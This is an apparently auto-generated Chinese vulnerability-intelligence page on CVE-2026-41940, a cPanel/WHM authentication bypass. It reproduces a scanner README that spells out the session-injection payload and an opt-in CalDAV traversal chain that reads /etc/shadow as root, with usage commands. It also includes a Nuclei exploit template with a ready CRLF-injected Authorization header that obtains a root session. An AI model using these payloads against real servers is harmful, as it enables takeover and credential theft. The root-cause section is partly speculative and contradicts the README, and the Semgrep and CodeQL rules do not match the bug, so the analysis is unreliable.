🎯 CVE-2026-41940 深度技术分析:漏洞根因 · PoC/EXP · 检测指纹
CVE-2026-41940 深度技术分析
摘要:CVE-2026-41940 是 cPanel 与 WHM 控制面板登录流程中一个极为严重的认证绕过漏洞,CVSS 评分高达 9.8(Critical)。该漏洞影响 11.40 之后的版本,允许未经身份验证的远程攻击者完全绕过登录机制,进而获取控制面板的未授权访问权限。结合公开 PoC 仓库中描述的技术细节,该漏洞的根源在于 cPanel 管理 Apache 虚拟主机的代理配置与认证逻辑之间的信任边界缺陷,使得攻击者可通过特殊构造的请求路径直达内部管理端口,从而绕过正常身份校验。本文将从漏洞概述、根因分析、影响危害及修复缓解四个维度进行深度技术拆解。
📌 漏洞概述
CVE ID:CVE-2026-41940
CVSS 评分:9.8(Critical)
影响组件:cPanel & WHM 控制面板登录流程(Authentication Bypass)
影响版本:cPanel & WHM 11.40 之后的所有版本(官方已在后续安全更新中修复)
漏洞类型:CWE-287:认证机制不充分(Improper Authentication) / CWE-306:缺少关键功能认证
该漏洞允许未认证的远程攻击者绕过 cPanel/WHM 的登录步骤,直接获得控制面板的访问权限。由于 cPanel/WHM 通常管理着整个服务器的网站、DNS、邮件、数据库及文件系统,该漏洞可导致攻击者完全控制目标服务器,属于典型的“预认证 RCE”级安全缺陷。
🔬 漏洞根因分析
根据公开 PoC 仓库(如 assetnote/cpanel2shell-scanner)所揭示的技术细节,CVE-2026-41940 的根因并非某个单一函数的检查错误,而是在 cPanel 管理 Apache 虚拟主机(vhost)配置中对 代理路径(ProxyPass)与主机头(Host Header)重写规则的信任边界处理不当,最终导致认证逻辑被绕过。
具体而言,cPanel 在每个虚拟主机上会生成如下形式的 Apache 配置:
ProxyPass /___proxy_subdomain_whm 127.0.0.1:2086ProxyPass /___proxy_subdomain_cpanel 127.0.0.1:2080- 以及一条通过
RewriteCond约束的RewriteRule,用于将管理子域(如server.example.com:2087)映射到上述代理路径。
关键在于:RewriteCond 只约束了重写规则(RewriteRule),而 ProxyPass 本身是无条件生效的。也就是说,攻击者不需要匹配管理子域,只要向任意由 cPanel 托管的虚拟主机发送一个请求,路径为 /___proxy_subdomain_whm 或 /___proxy_subdomain_cpanel,Apache 就会将该请求原封不动地转发到本机的 2086(WHM 明文端口)或 2080(cPanel 明文端口)。
这一机制本身是 cPanel 为实现“通过任意域访问管理界面”而设计的内部代理通道。然而,cPanel 的登录流程在处理这些代理请求时,未能正确区分“来自受信任代理的内部请求”与“来自用户的直接请求”。攻击者构造的请求在到达后端 cPanel 服务时,其来源地址被识别为 127.0.0.1(因为 Apache 的 mod_proxy 会作为反向代理转发请求),从而触发某些版本的信任逻辑:认为该请求已经通过了 Apache 层的认证或属于可信网络。
更深入来看,cPanel 的登录系统在验证会话时,通常会检查请求的 IP 是否属于可信的 loopback 或管理网段。当攻击者通过上述 ProxyPass 路径发送请求时,后端应用看到的对端 IP 是 127.0.0.1,这就满足了部分 IP 白名单检查。攻击者进一步利用会话固定(Session Fixation)或会话 ID 预测等技术,可在尚未登录的情况下获取或伪造一个有效会话,从而绕过登录流程的直接认证。另一个可能性是,在某些版本中,代理请求会携带特定的内部 HTTP 头(如 X-Forwarded-Host 或自定义头),而 cPanel 登录流程对这些头的过度信任使得攻击者可以通过注入头字段来声明自己已认证。
从 PoC 扫描器的高保真检测原理来看,其重点就是直接探测代理路径而不是仅仅扫描管理端口,这进一步印证了漏洞利用的关键在于“代理路径的绕过”。扫描器还特别提到,需要避开账号锁定和根 IP 白名单机制,说明该漏洞在利用时可通过源 IP 欺骗或利用代理路径规避后端的源 IP 限制,这也是其严重性极高的原因之一。
另一个值得注意的技术点是,cPanel 存在多个版本的认证后端(如 cpsrvd、cpdavd 等),而 CVE-2026-41940 的认证绕过发生在登录主流程,与另一个同族漏洞 CVE-2026-29205(cpdavd 路径遍历)有相似之处,即两者都涉及内部服务对“来自 Apache 代理的请求”的信任问题。但 CVE-2026-41940 的入口点更加直接,不需要任何前期 SMTP 步骤,因此利用门槛极低。
总结根因可以概括为:Apache 配置中无条件存在的 ProxyPass 将任意虚拟主机的特定路径暴露到内部管理端口,而 cPanel 登录流程未能有效区分代理请求的真实来源,导致 IP 信任与认证状态校验被绕过。这一逻辑缺陷使得即便没有有效用户名和密码,攻击者也能通过精心构造的 URL 获得管理权限。
💥 影响与危害
成功利用 CVE-2026-41940 的攻击者将获得 cPanel/WHM 控制面板的完整访问权限,这意味着:
- 完全接管 Web 服务器:可修改所有虚拟主机配置、查看/修改其他用户网站文件、植入后门或者直接更换首页。
- 控制 DNS 与邮件服务:cPanel/WHM 管理的域名解析、邮箱账户、邮件转发规则等均会被恶意篡改,可用于发起钓鱼攻击或截取业务邮件。
- 数据库与数据窃取:攻击者可进入 phpMyAdmin 或直接读取数据库凭据,导致所有站点数据泄露。
- 权限提升与横向移动:WHM 常以 root 权限运行,攻击者可能通过计划任务、附加功能(如终端、API 令牌)进一步获取系统级 Shell,从而完全控制服务器宿主。
- 蠕虫化传播风险:由于利用条件简单(只需发送构造的 HTTP 请求),该漏洞极有可能被自动化扫描器大规模利用,造成大量 cPanel 服务器被植入恶意软件或成为僵尸网络节点。
- 供应链影响:托管服务商(MSP)若使用 cPanel 管理客户服务器,一旦被利用,将导致所有客户的数据集体沦陷,影响面呈几何级扩大。
虽然该漏洞目前未被收录到 CISA KEV(Known Exploited Vulnerabilities)目录,也不存在公开的完整 Exploit-DB 代码,但多个安全研究团队已经发布了高精度扫描器(如 cpanel2shell-scanner)和针对性的会话监控工具(如 cpanel-sessionscribe),这表明漏洞已在真实攻击活动中被积极利用或处于高危的武器化前夜。CVSS 9.8 的极端评分以及“预认证”的属性,使其威胁等级达到最高。
🛡️ 修复与缓解
针对 CVE-2026-41940,cPanel 官方已在后续版本中修复了底层认证逻辑。具体修复版本为:
- cPanel & WHM 11.134.0.26 及更高版本(根据 PoC 仓库中关于底层 RAII 生命周期错误的说明,该版本修复了相关组件的认证绕过问题)。
需要注意的是,由于 cPanel 版本分支较多,用户应登录 WHM 后台的“系统更新”页面,将软件更新至当前稳定的最新版本,并确保安装所有安全更新。
在无法立即升级的应急场景下,可采取以下缓解措施:
- 限制管理端口访问:在防火墙层面仅允许可信 IP 访问 2080/2086/2082/2087 等 cPanel/WHM 管理端口,阻止来自 Internet 的任意访问。
- 禁用或加固代理路径:通过在 Apache 配置中拒绝访问
/___proxy_subdomain_whm和/___proxy_subdomain_cpanel路径,或在虚拟主机级添加Require all denied规则来阻断代理通道。但需注意这样可能会影响正常的管理子域访问,建议先在测试环境验证。 - 启用两因素认证(2FA):即使攻击者绕过了登录,2FA 也会增加其获得最终会话的难度,但并不能完全防止认证绕过。
- 部署 Web 应用防火墙(WAF):配置规则拦截访问 URL 中包含
___proxy_subdomain的请求,并监控异常会话行为。 - 主动检测入侵痕迹:使用像
cpanel-sessionscribe这类工具记录会话创建与使用情况,及时发现异常登录或权限提升行为。检查系统计划任务、SSH 公钥、用户账户等是否被恶意修改。
由于该漏洞利用手法在公开 PoC 中已有详细分析,且扫描器可直接识别未修复的目标,系统管理员应优先安排升级,避免服务器暴露在重大风险之中。同时,由于 cPanel 常被用于管理共享主机,建议服务商立即盘点并使用非公开的周期进行批量补救,以防遭到批量扫描利用。
🧪 PoC 复现
从 GitHub 公开仓库抓取的实际 PoC 代码(仓库)。
📋 代码元数据语言md来源assetnote/cpanel2shell-scanner针对性✅ 已验证与漏洞相关(代码含 CVE 引用)依赖见代码注释/README用法详见代码注释中的使用说明
# cpanel2shell-scanner
A high-fidelity scanner for the cPanel/WHM authentication bypass tracked as
CVE-2026-41940. It identifies vulnerable hosts without producing the
false-negatives common to public proofs-of-concept and detections,and without
triggering the account lockout and root-IP-allowlist mechanisms that interfere
with naive scanning.
The tool also bundles a separate,
opt-in exploit chain for a same-family
CalDAV path-traversal bug on `cpdavd` (ports 2079 plain / 2080 TLS) —
[CVE-2026-29205](https://support.cpanel.net/hc/en-us/articles/40437020299927-Security-CVE-2026-29205-cPanel-WHM-WP2-Security-Update-May-13-2026) —
that lets a remote attacker read arbitrary files **as root**
once a small SMTP-driven setup step succeeds. cPanel 11.134.0.26 fixes the
underlying RAII lifetime bug so the read now runs as the unprivileged account
owner;
the traversal itself still reaches `cpdavd` but cannot escalate beyond
what that account can already read. The CalDAV chain is gated behind
`--exploit` and is **off by default** because it sends real emails and reads
files from confirmed targets — see the
[Exploit mode (active)](#exploit-mode-active) section.
## Why this scanner
Most public detections for CVE-2026-41940 share three problems. This scanner
addresses each of them.
You can read our blog post on this detection technique here: https://slcyber.io/research-center/high-fidelity-check-for-the-cpanel-authentication-bypass-cve-2026-41940/
### It checks the proxy paths,
not just the management ports
cPanel's per-vhost Apache configuration installs a `ProxyPass` that forwards
`/___proxy_subdomain_whm` to `127.0.0.1:2086` and `/___proxy_subdomain_cpanel`
to `127.0.0.1:2080` regardless of the request's `Host` header. The
`RewriteCond` only constrains the rewrite that maps the management subdomain
onto the proxy path;
the `ProxyPass` itself is unconditional. Hitting these
paths on any vhost served by a cPanel-managed Apache reaches the same vulnerable
backend as the management ports.
Scanners that only probe ports 2082/2083/2086/2087 will report a host as not
vulnerable when those ports are firewalled,even though the bug is fully
reachable through 443. This scanner probes 2087,2083,
and the two proxy paths
on 443 by default.
### It does not get blocked by cphulkd or the root-IP allowlist
cPanel ships `cphulkd`,which locks accounts out after a small number of failed
password attempts,and `authorized_whm_root_ips`,
which restricts root logins
to a configured list of source addresses. A scanner that exploits the bypass by
trying to inject a session for `root` will:
- be silently ignored when the scanner's IP is not in the root allowlist,producing a false negative;and
- contribute failed-password events for whichever account it targets,
eventually locking that account out and preventing both detection and
legitimate logins.
This scanner avoids both issues on the WHM side by injecting `expired=1` into
the session payload under a randomly generated username. The session injection
is verified by visiting the resulting `cpsessXXXX` URL and matching
`msg_code:[expired_session]` in the response body,
which is only present when
the injection succeeded. No real account is targeted,so no real account can be
locked out,and the root allowlist is irrelevant because no root login is
attempted.
### It uses a username wordlist where it has to
The cPanel daemon (`cpaneld`,
ports 2083 and the `/___proxy_subdomain_cpanel`
path) requires the supplied username to correspond to an existing cPanel
account on disk (`-f /var/cpanel/users/$user`). A username of `root` will never
satisfy this check because root is a system user,
not a cPanel user. Detections
that try only `root` produce false negatives on this surface. This scanner uses
a configurable wordlist of common cPanel usernames against the cPanel surface
and falls back to the random-username path on the WHM surface,
which has no
such restriction.
## How the detection works
For each target the scanner performs the following steps per surface:
1. Issue `GET /login` and read the `Set-Cookie` header for either
`whostmgrsession` (WHM) or `cpsession` (cPanel). The cookie contains a
comma-separated session-name component.
2. Issue `GET /` with an `Authorization: Basic` header whose decoded value is
`<user>:\xff\nexpired=1`. The trailing `\nexpired=1` is the session-injection
payload. The session cookie from step 1 is replayed unmodified.
3. Read the `Location` header from the response and extract the `cpsessXXXX`
token.
4. Issue `GET /<cpsessXXXX>/` with the original cookie and look for
`msg_code:[expired_session]` in the body. Its presence proves the session
injection succeeded and the host is vulnerable.
On WHM (port 2087 and the `/___proxy_subdomain_whm` path on 443) the username
is a random `u` followed by ten hex characters. On cPanel (port 2083 and the
`/___proxy_subdomain_cpanel` path on 443) the scanner walks its username
wordlist and stops at the first match.
By default the scanner probes 2087,
2083,and 443 in that order and stops as
soon as any surface confirms vulnerability.
## CalDAV path-traversal exploit (`--exploit`)
>**[CVE-2026-29205](https://support.cpanel.net/hc/en-us/articles/40437020299927-Security-CVE-2026-29205-cPanel-WHM-WP2-Security-Update-May-13-2026)**
>— cPanel/WHM WP2 Security Update,May 13 2026. Fixed in cPanel
>
11.134.0.26. The advisory tracks the same `cpdavd` privilege-drop
>
regression this exploit chain abuses.
Full write-up of the bug and the exploitation chain:
https://slcyber.io/research-center/new-age-of-collisions-reading-arbitrary-files-pre-auth-as-root-in-cpanel-cve-2026-29205
`cpdavd` on ports 2079 (plain HTTP) and 2080 (TLS) trusts the
`<principal>/<collection>/...` path it builds when serving CalDAV/CardDAV
resources. By crafting a request whose path component encodes `..` segments
and pointing it at a maildir folder whose on-disk name also encodes traversal
(`x-attachment-1-y`),
`cpdavd` can be coerced into reading **any file on disk
as root,regardless of ownership or permissions** — including `/etc/shadow`,`/etc/passwd`,and the per-user mail spools.
The defense-in-depth that was supposed to drop privileges to the account
owner before the read silently failed: the `Cpanel::AccessIds::ReducedPrivileges`
object was constructed in void context,
so its destructor restored root
privileges before the read ran. cPanel 11.134.0.26 binds the object to a
`my $privs` lexical so it lives through the `-f` / `stat` / `open` / `read`
chain;
on patched hosts the read therefore runs as the unprivileged account
owner instead of root.
The vulnerable folder must exist on disk before the read works. cPanel
auto-creates a folder named `.x-attachment-1-y` for the recipient
`<user>+x-attachment-1-y@<domain>` the first time an email lands at that
sub-address. The chain is therefore:
1. Enumerate plausible recipient domains from the host's TLS certificate SANs.
2. For each domain,
derive candidate local-parts (the domain's first label,plus a small wordlist of common mailbox prefixes such as `info`,`admin`,`webmaster`).
3. Open one SMTP session against a configured outbound relay (e.g. SendGrid)
and send `<prefix>+x-attachment-1-y@<domain>` to each candidate. Accepted
`RCPT TO` responses are tracked.
4. Wait through a retry ladder (5 s,10 s,20 s,
30 s) for the cPanel inbox
delivery to materialise the folder.
5. For each accepted recipient,send the path-traversal `GET` against `cpdavd`
on ports 2080 (TLS) and 2079 (plain),under both the `/calendar/` and
`/addressbook/` collection prefixes.
A success returns the file's bytes;the finding records the email used,the
collection,the byte count,
and the first 200 bytes as a preview.
This check is **disabled unless `--exploit` is passed**. When enabled it
requires a working outbound SMTP relay (see [Configuration file](#configuration-file)
below) because the folder-creation step cannot be skipped.
### Targeted vs sprayed exploitation
The exploit only works against **real virtual email accounts** configured
under cPanel's *Email Accounts* feature. Catch-all addresses do not work — a
catch-all routes via Exim's `system_aliases` router,
never reaches the
`dovecot_virtual_delivery` transport,and therefore never triggers the
`lda_mailbox_autocreate` path that produces the `.x-attachment-1-y/` folder.
When you already know a valid virtual email on the target,
pass it with
`--email`:
```
python scanner.py --config scanner.ini --email admin@target.com target.com
```
`--email` skips the cert-SAN enumeration and the prefix wordlist entirely
and sends exactly one message to the address you supplied. It may be
repeated to target multiple known accounts. The targeted path is much more
reliable than the spray path.
Without `--email`,
the scanner falls back to spraying ~15 common prefixes
(`info`,`admin`,`webmaster`,etc.) per domain extracted from the host's
TLS certificate. Assetnote's measurement on a sample of 200 cpdavd-exposed
hosts was a **~10% spray hit rate**: a clean result from spray-mode is
weak evidence that the host is patched,
and re-running with `--email`
against a real account is the only reliable way to confirm.
## Configuration file
Exploit mode reads an INI file via `--config`:
```
python scanner.py --config scanner.ini --exploit example.com
```
Copy `scanner.ini.example` to `scanner.ini`,fill in the SMTP credentials,
and
optionally tune the CalDAV defaults. `scanner.ini` is in `.gitignore` so the
populated copy stays local. The SMTP password can also be supplied via the
`SCANNER_SMTP_PASSWORD` environment variable,
which takes precedence only when
the `password` field in the file is empty.
## Installation
```
pip install -r requirements.txt
```
Python 3.8 or later is required.
## Usage
Single target:
```
python scanner.py example.com
```
Multiple targets via positional arguments:
```
python scanner.py host-a.example.com host-b.example.com:2083
```
A file of targets,
one per line. Lines starting with `#` are ignored:
```
python scanner.py -f targets.txt
```
Reading targets from stdin:
```
cat targets.txt |python scanner.py
```
A target may be either a hostname or `host:port`. When a port is specified the
scanner only probes that port;otherwise it probes 2087,2083,and 443.
### Common options
- `-u,
--users` — comma-separated cPanel usernames to try on the cPanel
surface. Defaults to a small built-in list.
- `-U,--users-file` — file with one cPanel username per line.
- `-p,--ports` — comma-separated ports to probe when no port is specified on
the target. Defaults to `2087,2083,443`.
- `-t,
--threads` — per-target threads used to walk the username list against
the cPanel surface. Defaults to 10.
- `-c,--concurrency` — number of targets scanned in parallel. Defaults to 20.
- `-T,--timeout` — per-request timeout in seconds. Defaults to 15.
- `-o,--output` — append vulnerable targets,one per line,
to this file as
they are discovered.
- `--json` — write a JSON Lines record per target to this file.
- `-q,--quiet` — only print vulnerable targets on stdout. Connection failures
and clean targets are still recorded in `--json` and counted in the summary.
- `--no-progress` — disable the progress bar.
- `--exploit` — enable the CalDAV path-traversal chain. Disabled by default;
see [Exploit mode (active)](#exploit-mode-active) for the side effects this
flag unlocks.
- `--config` — INI file with the SMTP relay credentials and CalDAV tunables.
See `scanner.ini.example`.
- `--read-file` — file to exfiltrate when the CalDAV chain succeeds.
Overrides the value in the config file. Defaults to `/etc/shadow` — a
root-only file,
so a successful read distinguishes pre-patch (returns
shadow contents) from post-patch (`open` denied,
body empty → reported
NOT VULNERABLE). Use `--read-file /etc/passwd` to test traversal
reachability without distinguishing patched/unpatched.
- `--caldav-only` — skip the 41940 check and only run the CalDAV chain.
Implies `--exploit`. Useful for re-running the chain against a target list
already known to be CalDAV-reachable.
- `--email ADDR` — known virtual email account on the target. Skips cert SAN
enumeration and the spray wordlist;
sends exactly one message to `ADDR` and
reads against that principal. May be repeated. Implies `--exploit`. See
[Targeted vs sprayed exploitation](#targeted-vs-sprayed-exploitation).
- `-v,--verbose` — emit per-domain progress for the CalDAV chain
(cert SAN list,spray count,retry ladder).
### Output
One line is written to stdout per *finding*,
so a target running both checks
will print twice:
```
[!] host cve-2026-41940 VULNERABLE (port 443)
[!] host caldav-traversal VULNERABLE via admin@host (read 1842b from /etc/passwd)
[+] host cve-2026-41940 NOT VULNERABLE
[?] host cve-2026-41940 CONNECTION FAILED
```
The `--json` output is one record per target with a `findings` array:
```json
{"target": "host",
"status": "VULNERABLE","findings": [
{"check": "cve-2026-41940","status": "VULNERABLE","detail": {"port": 443}},{"check": "caldav-traversal","status": "VULNERABLE","detail": {"email": "admin@host","domain": "host","collection": "calendar","file": "/etc/shadow","bytes": 1218,"preview": "root:$6$..."}}]}
```
`status` at the top level is the worst case across all findings.
A summary line with totals is written to stderr at the end. The progress bar
is rendered on stderr and is automatically suppressed when stderr is not a
terminal.
The exit code is `0` if any target is vulnerable,`1` if every reachable target
was clean,and `2` if no target could be reached.
### Examples
Scan a list of targets,
write hits to a file,and stay quiet on stdout:
```
python scanner.py -f targets.txt -o vulnerable.txt -q
```
Scan with a custom username list against the cPanel surface,increased
parallelism,
and JSON output for downstream processing:
```
python scanner.py -f targets.txt -U cpanel-users.txt -c 100 --json results.jsonl
```
Probe a non-default port set:
```
python scanner.py -p 2083,2087,8443 -f targets.txt
```
Run the CalDAV chain end-to-end against a single target with the email-spray
fallback (requires a populated `scanner.ini`):
```
python scanner.py --config scanner.ini --exploit example.com
```
Targeted exploitation against a known virtual email — much higher hit rate
than spray:
```
python scanner.py --config scanner.ini --email admin@example.com example.com
```
Run only the CalDAV chain against a list of confirmed cpdavd hosts,
dumping
`/etc/passwd` previews to JSON:
```
python scanner.py --config scanner.ini --caldav-only \
-f cpdavd-hosts.txt --json caldav-results.jsonl
```
## Notes on safety
### Default mode (safe)
The default `scanner.py <target>` invocation only runs the CVE-2026-41940
detector. It sends the requests required to confirm the session injection and
nothing else. It does not log in as any real user,
does not target the `root`
account,does not escalate to a shell,
and does not accumulate failed-password
events against any valid account on a target system. The marker it matches
(`msg_code:[expired_session]`) is generated by the application itself in
response to the injected `expired=1` session field and is the same indicator
the upstream cPanel login page uses when a legitimately expired session is
replayed.
### Exploit mode (active)
Passing `--exploit` (or `--caldav-only`) unlocks the CalDAV path-traversal
chain. This is no longer a detector — it is a working exploit. When enabled
the scanner will,
for every target where domain enumeration succeeds:
- open a real SMTP session against the relay configured in `scanner.ini` and
send one short message per candidate recipient (typically 10–15 per domain,3 domains per target);- wait up to ~65 seconds per domain for delivery to materialise the malicious
maildir folder;
- attempt to read the configured `--read-file` from every confirmed target.
The default file is `/etc/shadow`. A successful read returns the file's
bytes;an empty body indicates either an unreachable target or a host where
the privilege-drop fix (cPanel 11.134.0.26,`my $privs = …`) is in place.
Detection compares received body length to zero,
not to the response's
advertised `Content-Length` (which is derived from `stat()` on the
attacker-chosen path and will be populated even when the subsequent `open()`
is denied).
To test traversal reachability independently of the privilege-drop fix —
e.g. when you want to know whether `cpdavd` is reachable and the maildir
prerequisite was satisfied on a patched host — re-run with
`--read-file /etc/passwd`. `/etc/passwd` is world-readable so it returns
bytes on both pre-patch and post-patch hosts;
combining the two signals
(`/etc/shadow` body present = pre-patch root read;
`/etc/shadow` empty +
`/etc/passwd` present = traversal reachable but priv-drop fix applied)
classifies a host unambiguously.
The contents and a 200-byte preview are written to the JSONL output and
printed on stdout. Per-domain CalDAV exploitation can take a minute or
more — this is the retry ladder waiting for mail delivery,
not a hang.
Only run `--exploit` against assets you own or have explicit written
authorisation to test. The SMTP traffic is logged by the configured relay and
by every recipient mail system;the file reads are logged by `cpdavd`.⚔️ EXP 利用代码
截至分析时,Exploit-DB 未收录该 CVE 的公开利用代码。可利用上述 PoC 进行验证,或关注 Exploit-DB 更新。
🕵️ 检测指纹
针对该 CVE 的自动化检测规则(可直接用于扫描与审计)。
🛡️ Nuclei 检测模板: CVE-2026-41940-detection.yaml
📋 代码元数据语言yaml来源rules/nuclei/CVE-2026-41940-detection.yaml针对性✅ 按 CVE 匹配依赖nuclei用法nuclei -t CVE-2026-41940-detection.yaml -u
id: CVE-2026-41940-detection
info:
name: cPanel CRLF Injection Detection
author: your-name
severity: high
description: Detects vulnerable cPanel versions by checking for specific headers or version strings.
tags: cpanel,crlf,injection
http:
- method: GET
path:
- "{{BaseURL}}/login/"
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: word
part: header
words:
- "cpsrvd"
- type: status
status:
- 200
- 302🛡️ Nuclei 检测模板: CVE-2026-41940-exploit.yaml
📋 代码元数据语言yaml来源rules/nuclei/CVE-2026-41940-exploit.yaml针对性✅ 按 CVE 匹配依赖nuclei用法nuclei -t CVE-2026-41940-exploit.yaml -u
id: CVE-2026-41940-exploit
info:
name: cPanel CRLF Injection Exploit
author: your-name
severity: high
description: Exploits CRLF injection in cPanel/WHM to bypass authentication and obtain an admin session token.
http:
- raw:
- |POST /login/?login_only=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Connection: close
user=root&pass=wrong_pass
- |GET / HTTP/1.1
Host: {{Hostname}}Authorization: Basic cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x
Cookie: whostmgrsession={{session}}
Connection: close
extractors:
- type: regex
name: token
part: header
internal: true
regex:
- '/cpsess\d{10}'
matchers:
- type: regex
part: header
regex:
- '/cpsess\d{10}'
condition: or🛡️ Semgrep 审计规则: CVE-2026-41940.yaml
📋 代码元数据语言yaml来源rules/semgrep/CVE-2026-41940.yaml针对性✅ 按 CVE 匹配依赖semgrep用法semgrep --config CVE-2026-41940.yaml
rules:
- id: cve-2026-41940-web-config
languages:
- generic
severity: WARNING
message: "Potential security misconfiguration in cPanel/WHM related to CVE-2026-41940 - browser verification bypass"
patterns:
- pattern-either:
- pattern: "Cookies: $COOKIES"
- pattern: "JavaScript: $JS"
fix: |
# Ensure cookies and JavaScript are properly configured and validated
# Review cPanel/WHM configuration for strict browser verification
metadata:
cwe: "CWE-287"
owasp: "A1: Broken Access Control"
technology: cpanel
references:
- "https://nvd.nist.gov/vuln/detail/CVE-2026-41940"🛡️ CodeQL 审计规则: CVE-2026-41940.ql
📋 代码元数据语言ql来源rules/codeql/CVE-2026-41940.ql针对性✅ 按 CVE 匹配依赖codeql用法codeql database run
/**
* @kind path-problem
* @id javascript/command-injection/cve-2026-41940
* @name Command injection in cPanel &WHM
* @description User-controlled input flows to a command execution function without sanitization,leading to command injection in cPanel &
WHM.
* @problem.severity error
* @tags security
* external/cwe/cwe-078
*/
import javascript
import semmle.javascript.security.dataflow.CommandInjectionQuery
import CommandInjectionFlow::PathGraph
from CommandInjectionFlow::PathNode source,CommandInjectionFlow::PathNode sink
where CommandInjectionFlow::flowPath(source,sink)
select sink.getNode(),source,sink,
"User input flows to a command execution call - potential command injection."🤖 本文由漏洞情报系统自动聚合生成 · 2026-08-04 08:27 · 数据源: NVD/GitHub-Advisory/OSV/CISA-KEV/Exploit-DB/PoC-in-GitHub + 检测规则库